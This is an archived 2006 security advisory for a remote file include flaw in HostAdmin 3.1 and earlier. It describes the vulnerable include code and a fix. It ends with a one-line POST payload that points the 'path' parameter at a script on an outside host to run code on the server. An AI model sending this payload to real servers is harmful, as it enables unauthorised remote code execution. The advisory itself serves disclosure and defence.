what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MajorSecurity-9.txt

MajorSecurity-9.txt
Posted Jun 11, 2006
Site majorsecurity.de

[MajorSecurity #9] HostAdmin 3.1 and prior - Remote File Include Vulnerability

tags | advisory, remote
SHA-256 | 8d94dfb563f0b734c5d4993c4ff573f0f99ab2a83e9c37c0a3df76a6aa8dfc9c

MajorSecurity-9.txt

Change Mirror Download
[MajorSecurity #9]HostAdmin <= 3.1 - Remote File Include Vulnerability
-------------------------------------------------------------------------

Software: HostAdmin

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://dreamcost.com

Risc: High

Credits:
----------------------------

Discovered by: David 'Aesthetico' Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:
----------------------------
http://www.majorsecurity.de/advisory/major_rls9.txt

Affected Products:
----------------------------

HostAdmin 3.1 and prior

Description:
----------------------------

HostAdmin is designed to automate your entire account and order management, recurring billing,
domain registration, server provisioning, and reporting needs. From creating the member account,
logging the member in, displaying available hosting and domain registration options,
providing a shopping cart and ordering mechanism for the available products, and creating the order record,
HostAdmin will handle your requirements with speed and ease.

Requirements:
----------------------------

register_globals = On

Vulnerability:
----------------------------

Input passed to the "path" parameter in "index.php", "functions.php" and "members.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.

Solution:
----------------------------

I think you can fix this bug by replacing the following vulnerable code in the
this 3 php-files with my one. It should fix the vulnerabilty and solve this
problem.

Vulnerable one: "include($path . "member_template.html");"
MajorSecurity fix: "include("member_template.html");"

Set "register_globals" to "Off".

Exploitation:
----------------------------

Post data:

path=http://www.yourspace.com/yourscript.php?
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close